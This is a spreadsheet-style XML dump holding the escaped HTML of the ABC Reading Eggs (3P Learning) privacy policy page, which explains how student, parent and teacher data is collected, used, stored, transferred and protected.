  &lt;link rel="canonical" href="https://readingeggs.com.au/privacy/"/&gt;
  &lt;!-- Le styles --&gt;
  &lt;link href="/favicon.ico" rel="shortcut icon"&gt;
  &lt;link href="/stylesheets/screen.css?time=2023-04-12T04%3A15%3A56%2B00%3A00" media="screen" rel="stylesheet" type="text/css" /&gt;
  &lt;!--[if</t>
  </si>
  <si>
    <t>IE]&gt;
      &lt;link href="/stylesheets/ie.css" media="screen, projection" rel="stylesheet" type="text/css" /&gt;
  &lt;! [endif]--&gt;
  &lt;!-- http://ogp.me/ --&gt;
&lt;meta property="og:title" content='Privacy Policy' /&gt;
&lt;meta property="og:type" content="website" /&gt;
&lt;meta property="og:image" content="https://readingeggs.com.au/images/reading-eggs-learn-to-read-app-thumb_200x200.png" /&gt;
&lt;meta property="og:image:alt" content="ABC Reading Eggs Learn to Read app" /&gt;
&lt;meta property="og:url" content="https://readingeggs.com.au/privacy/" /&gt;
&lt;meta property="og:description" content="Read the ABC Reading Eggs policy regarding information supplied to us by our members. Try a FREE 14 day trial of ABC Reading Eggs today!"</t>
  </si>
  <si>
    <t>/&gt;
&lt;/head&gt;
  &lt;body class="sticky-footer-root"&gt;
    &lt;!-- Google Tag Manager --&gt;
&lt;noscript&gt;&lt;iframe src="//www.googletagmanager.com/ns.html?id=GTM-KMLP9L"
height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;
&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
'//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-KMLP9L');&lt;/script&gt;
&lt;!-- End Google Tag Manager --&gt;
    &lt;div id="wrapper" class="sticky-footer-body"&gt;
      &lt;section id="blake-global" class="global-header-sticky-bar"&gt;
  &lt;nav class="navbar navbar-default navbar-fixed-top"&gt;
    &lt;div class="container "&gt;
      &lt;div class="row"&gt;
        &lt;ul class="pathway hidden-xs" &gt;
          &lt;li</t>
  </si>
  <si>
    <t>class="pathway-parents"&gt;&lt;a id="gtm-topnav-parents" href="/" class="btn btn-pathway-toggle-selected" role="button"&gt;Parents&lt;/a&gt;
          &lt;/li&gt;
          &lt;li class="pathway-schools"&gt;&lt;a id="gtm-topnav-schools" href="/schools/" class="btn btn-pathway-toggle-not-selected"&gt;Schools&lt;/a&gt;
          &lt;/li&gt;
        &lt;/ul&gt;
         &lt;ul class="blake-brands global-header-sticky-bar__product-links hidden-xs hidden-sm"&gt;
          &lt;li&gt;&lt;a id="gtm-topnav-readingeggs" href="/" class="selected"&gt;Reading Eggs&lt;/a&gt;
          &lt;/li&gt;
          &lt;li&gt;&lt;a id="gtm-topnav-readingeggsjunior" href="http://readingeggsjunior.com.au/" class="not-selected"&gt;Reading Eggs Junior&lt;/a&gt;
          &lt;/li&gt;
          &lt;li&gt;&lt;a id="gtm-topnav-readingeggspress" href="http://readingeggspress.com.au/" class="not-selected"&gt;Reading Eggspress&lt;/a&gt;
          &lt;/li&gt;
          &lt;li&gt;&lt;a id="gtm-topnav-mathseeds " href="http://mathseeds.com.au" class="not-selected"&gt;Mathseeds&lt;/a&gt;
          &lt;/li&gt;
        &lt;/ul&gt;
        &lt;ul class="global-header-sticky-bar__ctas"&gt;
          &lt;li</t>
  </si>
  <si>
    <t xml:space="preserve">class="global-header-sticky-bar__cta--login"&gt;&lt;a id="gtm-topnav-login" href="https://app.readingeggs.com/login" class="btn btn-global btn-global--secondary" role="button"&gt;&lt;i class="fa fa-lock" aria-hidden="true"&gt;&lt;/i&gt; Login&lt;/a&gt;
          &lt;/li&gt;
          &lt;li class="global-header-sticky-bar__cta--register"&gt;&lt;a id="gtm-topnav-signup" href="/signup/" class="btn btn-global btn-global--primary" role="button"&gt;Sign Up &lt;i class="fa fa-caret-right" aria-hidden="true"&gt;&lt;/i&gt;&lt;/a&gt;
          &lt;/li&gt;
        &lt;/ul&gt;
      </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/div&gt;
    &lt;/div&gt;
  &lt;/nav&gt;
  &lt;div style="margin-bottom:38px"&gt;&lt;/div&gt;
&lt;/section&gt;
  &lt;header class="global-header-banner "&gt;  
    &lt;div class="container "&gt;
      &lt;a href="/" id="gtm-banner-logo"&gt;
        &lt;div  class="global-header-banner__logo-container" &gt;
          &lt;img src="/images/logos/program-logos-svg/re-logo-abc-white-shadow.svg" alt="ABC Reading Eggs Learn to Read Program for Kids" class="global-header-banner__logo"&gt;
          &lt;img src="/images/logos/reggie-welcome.png" alt="Welcome to Reading Eggs" class="global-header-banner__reggie-welcome"&gt;
        &lt;/div&gt;
      &lt;/a&gt;
    &lt;/div&gt;
  &lt;/header&gt;
&lt;nav id="site-nav" class="navbar navbar-default global-header-primary-nav"&gt;
    &lt;!-- Navbar --&gt;
    &lt;div class="container"&gt;
        &lt;div class="navbar-header"&gt;
            &lt;button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse"&gt;
                &lt;span class="sr-only"&gt;Toggle navigation&lt;/span&gt;
                &lt;span class="icon-bar"&gt;&lt;/span&gt;
                &lt;span class="icon-bar"&gt;&lt;/span&gt;
                &lt;span class="icon-bar"&gt;&lt;/span&gt;
            &lt;/button&gt;
        &lt;/div&gt;
        &lt;div id="navbar" class="navbar-collapse collapse"&gt;
            &lt;ul class="nav navbar-nav"&gt;
                &lt;li&gt;&lt;a href="/"&gt;Home&lt;/a&gt;&lt;/li&gt;
                &lt;li&gt;&lt;a href="/about"&gt;About &lt;span class="caret"&gt;&lt;/span&gt;&lt;/a&gt;
                    &lt;ul class="dropdown-menu first-level-dropdown"&gt;
                        &lt;li&gt;&lt;a href="/about/why-it-works"&gt;Why it works&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="/about/parents"&gt;Parents&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="/about/homeschool"&gt;Homeschool&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="/free-resources/"&gt;COVID-19 Support&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class='drop-link' href="#"&gt;Lessons&lt;span class="caret sub-caret"&gt;&lt;/span&gt;&lt;/a&gt;
                            &lt;ul class="dropdown-menu sub-dropdown"&gt;
                                &lt;li&gt;&lt;a href="/about/sample-lesson"&gt;Try a Sample Lesson&lt;/a&gt;&lt;/li&gt;
                                &lt;li&gt;&lt;a href="/about/lesson-overview"&gt;Lesson Overview&lt;/a&gt;&lt;/li&gt;
                                &lt;li class="divider sub-divider"&gt;&lt;/li&gt;
                            &lt;/ul&gt;
                        &lt;/li&gt;
                        &lt;li&gt;&lt;a href="/childrens-books-online-library"&gt;Online Library&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class='drop-link' href="#"&gt;Research and News&lt;span class="caret  sub-caret"&gt;&lt;/span&gt;&lt;/a&gt;
                            &lt;ul class="dropdown-menu sub-dropdown"&gt;
                                &lt;li&gt;&lt;a href="/about/research"&gt;Research&lt;/a&gt;&lt;/li&gt;
                                &lt;li&gt;&lt;a href="/news/"&gt;News&lt;/a&gt;&lt;/li&gt;
                                &lt;li class="divider sub-divider"&gt;&lt;/li&gt;
                            &lt;/ul&gt;
                        &lt;/li&gt;
                        &lt;li&gt;&lt;a href="/about/phonics"&gt;Why Phonics?&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a class='drop-link' href="#"&gt;Reading Eggs Products &lt;span class="caret  sub-caret"&gt;&lt;/span&gt;&lt;/a&gt;
                            &lt;ul class="dropdown-menu sub-dropdown"&gt;
                                &lt;li&gt;&lt;a href="/about/products"&gt;Reading Eggs Book Store&lt;/a&gt;&lt;/li&gt;
                                &lt;li&gt;&lt;a href="/about/ebooks"&gt;Amazon Kindle eBooks&lt;/a&gt;&lt;/li&gt;
                                &lt;li class="divider sub-divider"&gt;&lt;/li&gt;
                            &lt;/ul&gt;
                        &lt;/li&gt;
                        &lt;li&gt;&lt;a class='drop-link' href="#"&gt;Testimonials &amp; Awards&lt;span class="caret  sub-caret"&gt;&lt;/span&gt;&lt;/a&gt;
                            &lt;ul class="dropdown-menu sub-dropdown"&gt;
                                &lt;li&gt;&lt;a href="/about/testimonials"&gt;Testimonials&lt;/a&gt;&lt;/li&gt;
                                &lt;li&gt;&lt;a href="/about/awards"&gt;Awards&lt;/a&gt;&lt;/li&gt;
                                &lt;li class="divider sub-divider"&gt;&lt;/li&gt;
                            &lt;/ul&gt;
                        </t>
  </si>
  <si>
    <t>&lt;/li&gt;
                        &lt;li&gt;&lt;a class='drop-link' href="#"&gt;FAQs &amp; Technical Requirements&lt;span class="caret  sub-caret"&gt;&lt;/span&gt;&lt;/a&gt;
                            &lt;ul class="dropdown-menu sub-dropdown"&gt;
                                &lt;li&gt;&lt;a href="/info/faqs"&gt;FAQs&lt;/a&gt;&lt;/li&gt;
                                &lt;li&gt;&lt;a href="/technical-requirements"&gt;Technical Requirements&lt;/a&gt;&lt;/li&gt;
                                &lt;li&gt;&lt;a href="/webinars"&gt;Webinars&lt;/a&gt;&lt;/li&gt;
                                &lt;li class="divider sub-divider"&gt;&lt;/li&gt;
                            &lt;/ul&gt;
                        &lt;/li&gt;
                        &lt;li&gt;&lt;a href="/contact-us"&gt;Contact Us&lt;/a&gt;&lt;/li&gt;
                    &lt;/ul&gt;
                &lt;/li&gt;
                &lt;li&gt;&lt;a href="/articles"&gt;Articles&lt;/a&gt;&lt;/li&gt;
                &lt;li&gt;&lt;a href="/fast-phonics-games/"&gt;Fast Phonics&lt;/a&gt;&lt;/li&gt;
                &lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t>href="/schools/"&gt;Schools&lt;/a&gt;&lt;/li&gt;
                &lt;li&gt;&lt;a href="/pricing/"&gt;Pricing&lt;/a&gt;&lt;/li&gt;
                &lt;li&gt;&lt;a href="/apps/"&gt;Apps&lt;/a&gt;&lt;/li&gt;
                &lt;!-- &lt;li&gt;&lt;a href="/back-to-school-hub/"&gt;Back-to-School&lt;/a&gt;&lt;/li&gt; --&gt;
            &lt;/ul&gt;
        &lt;/div&gt;
    &lt;/div&gt;
&lt;/nav&gt;
      &lt;div class="container" id="main"&gt;
        &lt;div class="body about"&gt;
    &lt;h1&gt;About 3P Learning's Privacy Policy&lt;/h1&gt;
&lt;p&gt;&lt;strong&gt;Last updated 24 October 2022&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt; This webpage explains our privacy and security commitments in plain language.&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;
        &lt;p&gt;3P Learning is a global e&amp;#8209;learning resource company. We produce and/or distribute a range of online resources and a network of websites including but not limited to those for the &lt;a target="_blank" href="https://www.3plearning.com/software/mathletics/?"&gt;Mathletics&lt;/a&gt;, &lt;a target="_blank" href="https://www.3plearning.com/software/spellodrome/?"&gt;Spellodrome&lt;/a&gt;, &lt;a target="_blank" href="https://www.3plearning.com/software/readiwriter/?"&gt;Readiwriter&lt;/a&gt;, &lt;a target="_blank" href="https://www.3plearning.com/software/reading-eggs/?"&gt;Reading&amp;nbsp;Eggs&lt;/a&gt;, &lt;a target="_blank" href="https://www.3plearning.com/software/mathseeds/?"&gt;Mathseeds&lt;/a&gt;, &lt;a target="_blank" href="https://www.3plearning.com/software/wordflyers/?"&gt;Wordflyers&lt;/a&gt;, &lt;a target="_blank" href="https://www.writinglegends.com/?r=AU"&gt;Writing&amp;nbsp;Legends&lt;/a&gt;, &lt;a target="_blank" href="https://www.storyathon.com/?r=AU"&gt;Storyathon&lt;/a&gt; and &lt;a target="_blank" href="https://teacherworkshopseries.com/?r=AU"&gt;Teachers Workshop Series&lt;/a&gt; (collectively, the 'Site'), and World Maths Day / World Education Games branded resources and products.</t>
  </si>
  <si>
    <t>&lt;/p&gt;
     &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;Each product or resource, together with challenge websites for national and regional events which may use or integrate with the Site, is owned and operated by 3P Learning group of companies (including 3P Learning Limited, Blake eLearning and their related entities and subsidiaries) (collectively, '3P Learning' or 'us' or 'we').&lt;/p&gt;
     &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;References to the Site in this Privacy Policy includes all products and resources that we produce and /or</t>
  </si>
  <si>
    <t xml:space="preserve">distribute&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;3P Learning is committed to protecting the safety and security of our registered users, including students, teachers, school administrators and parents (collectively, Registrants) and we are sensitive to our Registrant's concerns about the safety of the personal information provided to us. Please read this Privacy Policy carefully in order to understand how any personal information collected by us is used.&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;As a global company, our Privacy Policy has been developed in accordance with a range of legislation which applies to us. In addition, we have developed our privacy framework to assist our customers that are schools, districts and education bodies to comply with privacy legislation and regulations applicable to them and the way they manage personal information.&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;Collectively, this legislation includes, without limitation:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li&gt;The Australian Privacy Act 1988&lt;/li&gt;
            &lt;li&gt;The New Zealand Privacy Act 1993&lt;/li&gt;
            &lt;li&gt;The United Kingdom Data Protection Act 2018 (&lt;a target="_blank" href="https://assets-homepages-learning.3plearning.net/wp-content/uploads/2021/04/Registration-Certificate_2021.pdf"&gt;View 3P Learning's ICO Registration Certificate&lt;/a&gt;)&lt;/li&gt;
            &lt;li&gt;The United States Children's Online Privacy Protection Act ("COPPA") and Rule
                as administered by the Federal Trade Commission
            &lt;/li&gt;
            &lt;li&gt;The United States Family Educational Rights and Privacy Act ("FERPA")&lt;/li&gt;
            &lt;li&gt;The Alberta Freedom of Information and Protection of Privacy Act&lt;/li&gt;
            &lt;li&gt;The Canadian Personal Information Protection and Electronic Documents Act ("PIPEDA")&lt;/li&gt;
            &lt;li&gt;The Freedom of Information and Protection of Privacy Act (British Columbia) ("FIPPA")&lt;/li&gt;
            &lt;li&gt;The Personal Information International Disclosure Protection Act (Nova Scotia) ("PIIDPA")&lt;/li&gt;
            &lt;li&gt;The Municipal Freedom of Information and Protection of Privacy Act, Ontario ("MFIPPA")&lt;/li&gt;
            &lt;li&gt;The Student Online Personal Information Protection Act, California ("SOPIPA")&lt;/li&gt;
            &lt;li&gt;The EU General Data Protection Regulation (Regulation 2016/679)("GDPR")&lt;/li&gt;
            &lt;li&gt;The UK General Data Protection Regulation ("UK GDPR")&lt;/li&gt;
            &lt;li&gt;The South African Protection of Personal Information Act ('POPI Act').&lt;/li&gt;
        &lt;/ul&gt;
    </t>
  </si>
  <si>
    <t>&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt; What personal information we collect&lt;/h2&gt;
&lt;ul&gt;
    &lt;li&gt;
        &lt;p&gt; We collect the following categories of personal information:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li&gt;As a customer, prospective customer, or user of our Site, we may collect information such as your name, contact information including phone number and email address, school name, class year and country or state of residence or school&lt;/li&gt;
            &lt;li&gt;We may also collect details of other interactions that you have with us, together with any other information that you choose to provide us with, for example, through your interactions with our customer and technical support teams.&lt;/li&gt;
            &lt;li&gt;We do not however collect any unnecessary personal information from Registrants (for instance, information about religious beliefs).&lt;/li&gt;
            &lt;li&gt;It is impractical in most circumstances for you to remain anonymous, and we may not be able to interact with you, provide access to the Site, or answer your enquiry if we are not able to identify you or collect your personal information.&lt;/li&gt;
            &lt;li&gt;In the case of school/educational institution customers (School Customer), we seek consent from the School Customer to be provided with Registrant information for and on behalf of that student or teacher.&lt;/li&gt;
            &lt;li&gt;</t>
  </si>
  <si>
    <t>In the case of individual / home subscriptions (Home Customers) we seek consent from the Home Customer at the time of purchasing and registering the product to use the information collected. Where the Home Customer is a student who is a minor, we ask that permission be sought by that student's parent / legal guardian.&lt;/li&gt;
            &lt;li&gt;Registrants who do not give this consent (or do not have this consent provided on their behalf) cannot provide us with their personal information and cannot use the Site. You can however withdraw your consent at any time.&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;</t>
  </si>
  <si>
    <t>What we will do with your information&lt;/h2&gt;
&lt;ul&gt;
    &lt;li&gt;
        &lt;p&gt; The information collected from Registrants, customers or prospective customers may be used for the following purposes:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li&gt;to provide access to our products and services;&lt;/li&gt;
            &lt;li&gt;to manage prospective purchases, purchased subscriptions and payments including to provide quotes or offers for, and updates about, our products and services;&lt;/li&gt;
            &lt;li&gt;to send a confirmation notice to the Registrant of the registration; to administer and manage accounts, including password resetting, responding to questions raised by Registrants, to contact the Registrant about any problems with the Registrant's account or conduct on the Site;&lt;/li&gt;
            &lt;li&gt;to send out a 3P Learning newsletter or emails about the Site including information about current events, changes, improvements, upgrades, new product development and rules of the Site;&lt;/li&gt;
            &lt;li&gt;to publish the names of winners and high performers on the Site or in the 3P Learning newsletter and to provide results data for each Registrant or school class;&lt;/li&gt;
            &lt;li&gt;to send prizes or certificates for participation and performance on the Site;&lt;/li&gt;
            &lt;li&gt;for administrative, planning, product or service development, staff training, quality control and research purposes relating to our products and services;&lt;/li&gt;
            &lt;li&gt;for marketing purposes, but only where we have express or implied consent to contact someone or we are otherwise permitted by law to do so. Registrants may also opt out at any time by following the specific opt out instructions within the communications that we send.&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
    &lt;li&gt;Hall of Fame leaderboards: 3P Learning strives to provide a highly engaging Site for students.</t>
  </si>
  <si>
    <t>Given students have indicated their strong preference for their name to be shown publicly on our Sites in recognition of their achievements, we allow this &amp;ndash; but we do not allow full names (i.e. First Name and Surname) to be shown publicly. In addition, all administrative user access to any Site permits the partial (to initials only) or full anonymising (by use of a pseudonym) of names, where preferred by the user. If you have any questions about the Hall of Fame and managing the information that is disclosed, please &lt;a href="mailto:privacy@3plearning.com?"&gt;contact us&lt;/a&gt;.&lt;/li&gt;
    &lt;li&gt;The Site does not provide students with any means to communicate directly with each other.</t>
  </si>
  <si>
    <t>There are no chat rooms connected with the learning resources.&lt;/li&gt;
    &lt;li&gt;Access to, and use of customer feedback forums, such as 3P Learning Uservoice, is designed for use by parents, teachers and other contributors who are not legally minors.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt; What we will not do with your personal information&lt;/h2&gt;
 &lt;ul&gt;
    &lt;li&gt;
        &lt;p&gt;3P Learning will keep your personal information confidential and not sell or disclose your information to advertisers or any external third parties, unless:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li&gt;we believe, in good faith, that we are required to share your information with a third party such as a regulator or court in order to comply with law, regulation, legal process, court order or subpoena;&lt;/li&gt;
            &lt;li&gt;to enforce our Terms &amp;amp; Conditions or the terms of the licence granted to access and use the Site;&lt;/li&gt;
            &lt;li&gt;the disclosure is to a third party that acts on our behalf, powers certain aspects of our Sites or processes data on our behalf, such as a distributor of our products and services, the licensor or owner of a product or resource that we distribute, or to a contracted service provider;&lt;/li&gt;
            &lt;li&gt;in connection with any transaction involving our companies or assets, where another party acquires ownership or operation of the Site, in which case that successor organization will be subject to the obligations in this Privacy Policy and any contractual representations we have entered into; or&lt;/li&gt;
            &lt;li&gt;to protect the safety and security of our Registrants and our Site.&lt;/li&gt;
            &lt;li&gt;If third parties act on our behalf, we require them to hold, use and disclose your personal information in accordance with this Privacy Policy, applicable privacy obligations and our contractual obligations&lt;/li&gt;
            &lt;li&gt;Generally we will only use your information within 3P Learning, however, sometimes we provide data on results to government education departments, peak bodies managing or representing schools, or schools themselves, especially in the case of School Customers, who use the features of our products (such as performance reporting tools) for educational / teaching purposes.</t>
  </si>
  <si>
    <t xml:space="preserve">We will require these third parties to comply strictly with our instructions, use the information only for legitimate educational interests and not for any commercial purposes&lt;/li&gt;
            &lt;li&gt;We do not sell data to advertisers (whether personal, anonymous or aggregated). We do not use data to engage in targeted advertising to children and we do not create or build personal profiles of students other than for the purpose of supporting authorized educational/school purposes or as otherwise specifically authorized by a parent/student or school/educational institution customer.&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;How we collect and process your information&lt;/h2&gt;
&lt;ul&gt;
    &lt;li&gt;
        &lt;p&gt; We may collect your personal information in a number of ways, including:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li&gt;
                &lt;p&gt;directly from you (unless it is unreasonable or impracticable to do so);&lt;/p&gt;
            &lt;/li&gt;
            &lt;li&gt;
                &lt;p&gt;from our school / educational institution customers (e.g. teachers or school administrators that purchase access to our Site for their students and teachers); or&lt;/p&gt;
            &lt;/li&gt;
            &lt;li&gt;
                &lt;p&gt;from third parties such as our distributors (resellers and sales agents).&lt;/p&gt;
                </t>
  </si>
  <si>
    <t>&lt;ul&gt;
                    &lt;li&gt; In order to register for 3P Learning resources, students registering individually and not part of a school, must give their consent at the time of registration to provide us with their personal information such as their name, age and email address (or if they are under 13 years of age, or legally a minor in their relevant location, a parent or guardian must consent on their behalf and provide the student's personal information).&lt;/li&gt;
                    &lt;li&gt;Alternatively, parents registering on behalf of their child(ren), must give their consent at the time of registration to provide us with information about them and their child(ren).&lt;/li&gt;
                    &lt;li&gt;Teachers or administrators registering for their class or school must give their consent at the time of registration to provide us with their own name, class name, school name and their email address, as well as the names of their students.&lt;/li&gt;
                    &lt;li&gt;We also ask for Registrants' consent to use any personal information collected in accordance with this Privacy Policy at the time of login to our Site. If a Registrant does not wish to provide us with their consent, they cannot agree to the Site Terms and Conditions and must not use the Site.&lt;/li&gt;
                &lt;/ul&gt;
            &lt;/li&gt;
        &lt;/ul&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;How long we hold your information&lt;/h2&gt;
&lt;ul&gt;
    &lt;li&gt;We retain the personal information that we collect from and about our Registrants for as long as it is needed to provide access to the Site or to manage that Registrant's account.</t>
  </si>
  <si>
    <t>We take reasonable steps to delete the personal information we collect if your registration to use our Site lapses and you (or if you are under 13 or legally a minor in your relevant location, a parent or guardian may request on your behalf) opt out of receiving further communications from us, or if you ask us to delete your information. We may however retain and use personal information as necessary to comply with our legal and regulatory obligations, to resolve disputes and to enforce our agreements, and we may retain and use anonymous and aggregated information for performance reporting, benchmarking and analytic purposes and for product and service improvement.&lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;Registrants can request that their personal information be deleted by contacting the 3P Learning Data Protection and Privacy Officers as set out below:&lt;/p&gt;
        &lt;p&gt;For Reading&amp;nbsp;Eggs/Mathseeds products: &lt;a href="mailto:dpo@3plearning.com"&gt;dpo@3plearning.com&lt;/a&gt; or 1300&amp;nbsp;457&amp;nbsp;271&lt;/p&gt;
        &lt;p&gt; For other products: &lt;a href="mailto:privacy@3plearning.com"&gt;privacy@3plearning.com&lt;/a&gt; &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Updating and accessing your personal information&lt;/h2&gt;
&lt;ul&gt;
    &lt;li&gt;Registrants have a right to request a copy of the personal information we hold about them, and Registrants can also update their personal information at any time, in each case by contacting 3P Learning.&lt;/li&gt;
    &lt;li&gt;If you wish to receive a copy of this information or to update or correct information held about you, please address your request to the Privacy and Data Protection Officers.</t>
  </si>
  <si>
    <t>We will endeavour to deal with your request promptly.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Keeping your personal information secure&lt;/h2&gt;
&lt;ul&gt;
    &lt;li&gt;3P Learning is committed to information security. We will use all reasonable endeavours to keep the personal information we collect and use in a secure environment, and we have implemented appropriate technical, administrative and physical security measures that are designed to protect personal information from unauthorised access, disclosure, use and modification. These measures include the encryption of personal information and the implementation of organisational measures, such as our incident response plan.</t>
  </si>
  <si>
    <t>As part of our privacy compliance processes we review these security procedures to consider appropriate new technology and methods and engage independent third parties to review and audit aspects of our information security. &lt;/li&gt;
    &lt;li&gt;We use Microsoft Azure and Amazon Web Services for data hosting and storage. Both providers are recognised for their leading approaches to data security.</t>
  </si>
  <si>
    <t>For example, Reading&amp;nbsp;Eggs, MathSeeds and Wordflyers ae hosted in Amazon Data Center Oregon USA and Mathletics/ReadiWriter are hosted in Azure Data Center East Coast US 2 region.&lt;/li&gt;
    &lt;li&gt;Further information regarding Microsoft Azure privacy and security practices, including the latest updates and compliance information, can be found at &lt;a target="_blank" href="http://news.microsoft.com/security2015"&gt;http://news.microsoft.com/security2015&lt;/a&gt; and &lt;a target="_blank" href="https://www.microsoft.com/en-us/trustcenter/security/azure-security"&gt;https://www.microsoft.com/en-us/trustcenter/security/azure-security&lt;/a&gt;. &lt;/li&gt;
    &lt;li&gt;Further information regarding Amazon Web Services privacy and security practices, including the latest updates and compliance information, can be found at &lt;a target="_blank" href="https://aws.amazon.com/compliance/data-privacy-faq/"&gt;https://aws.amazon.com/compliance/data-privacy-faq/&lt;/a&gt; and &lt;a target="_blank" href="https://aws.amazon.com/security/"&gt;https://aws.amazon.com/security/&lt;/a&gt; &lt;/li&gt;
    &lt;li&gt;We provide our personnel with training about data security and privacy, and we require all our employees and contractors to comply with this Privacy Policy and their obligations of confidentiality. We will take appropriate actions to address breaches by employees and contractors of the obligations imposed by this Privacy Policy.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Data transfers, storage and processing globally&lt;/h2&gt;
&lt;ul&gt;
    &lt;li&gt;
        &lt;p&gt;Registrants' personal information is uploaded to and stored on servers that are maintained by third party providers, Microsoft Azure and Amazon Web Services, at locations in the United States, Europe and Australia.</t>
  </si>
  <si>
    <t>For further information about where personal information is hosted please see our &lt;a target="_blank" href="https://assets-homepages-learning.3plearning.net/wp-content/uploads/2021/03/3p-learning-data-privacy-security-faq.pdf"&gt;Data Privacy and Security FAQs&lt;/a&gt;.&lt;/p&gt;
     &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;As we operate globally, we may on occasion allow your personal information to be accessed in countries other than your own location. We may do this where data is accessed:&lt;/p&gt;
        &lt;ul&gt;
            &lt;li&gt;by companies within the 3P Group (i.e. 3P Learning Limited, Blake eLearning and their related entities and subsidiaries) for operational, administrative and compliance purposes;&lt;/li&gt;
            &lt;li&gt;by our sales, operational or global customer support teams (primarily, although not exclusively, located in Australia, the United Kingdom, the USA and Canada);</t>
  </si>
  <si>
    <t>or&lt;/li&gt;
            &lt;li&gt;by one of our licensors (who owns, develops and hosts a particular product) or distributors (sales agents or resellers) who requires the information to set up, service or manage a customer account;&lt;/li&gt;
            &lt;li&gt;where a copy is sent to the Registrant itself at their request.&lt;/li&gt;
        &lt;/ul&gt;
     &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;By consenting to the collection and use of their personal information, Registrants' consent to their personal information being transferred and stored in this manner.&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;Registrants in Canada, please refer to our additional information about Canadian users. In accordance with various Canadian provinces' privacy legislations applicable to many of our school customers we do not store Canadian students' personal identifiable information outside of Canada.</t>
  </si>
  <si>
    <t>All the data pertaining to a student's activity within the platform (non&amp;#8209;identifiable data) is stored in the East US 2 region of Microsoft Azure. Access to the data is restricted only to the users themselves &amp;ndash; and then only via our own applications. It is strictly inaccessible outside of the environment of a 3P Learning resource account and each user only has access to their own data (or in the case of a school's administrator or IT technician, the data within the school's wider account).&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;Registrants in the EU, please refer to our additional information about EU users.&lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;In the APAC region, we may record, with your express consent, customer service calls for quality and staff training purposes.</t>
  </si>
  <si>
    <t>If, with your consent, we record a customer service telephone call, that recording will be stored in data centres located in Australia and deleted when no longer required.&lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Anonymous or aggregated information&lt;/h2&gt;
&lt;ul&gt;
    &lt;li&gt; In addition to personal information and results data, 3P Learning also collects anonymous information about Registrants and the activities of Registrants on the Site. Anonymous information is information that is not linked to the name or identity of a user.</t>
  </si>
  <si>
    <t>This information is used for educational performance reporting and analytics and to assist us in enhancing the learning resources. The information remains anonymous at all times.&lt;/li&gt;
    &lt;li&gt;3P Learning utilises third&amp;#8209;party providers to power certain elements of the Company's online marketing and advertising. These service providers collect data about your activities that does not personally or directly identify you when you visit our website or the websites and online services where we display advertisements (i.e. publishers).</t>
  </si>
  <si>
    <t>This information may include the content you view, the date and time that you view this content, the products you purchase, or your location information associated with your IP address. We use the information we and these third party service providers collect to serve you more relevant advertisements regarding 3P Learning resources (referred to as "retargeting"). We collect information about where you saw the ads and what ads you clicked on.</t>
  </si>
  <si>
    <t>This is data that does not personally or directly identify you. We do not engage in this type of marketing or advertising to students or children.&lt;/li&gt;
    &lt;li&gt;When agreeing to the Term and Conditions, Registrants grant us the right to use this anonymous information for our own purposes, such as the preparation of statistical reports or to improve and change the content of our products.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Cookies &amp;amp; Third Party Technologies Policy&lt;/h2&gt;
&lt;p&gt; This section explains how 3P Learning Limited and its group entities (&lt;strong&gt;3P Learning&lt;/strong&gt; or &lt;strong&gt;we&lt;/strong&gt;) use cookies and third party technologies on our websites (&lt;strong&gt;Websites&lt;/strong&gt;) and in online products and services the we own, operate and/or distribute, including Mathletics, Readiwriter, Mathseeds, Reading&amp;nbsp;Eggs, Word&amp;nbsp;Flyers, Writing&amp;nbsp</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
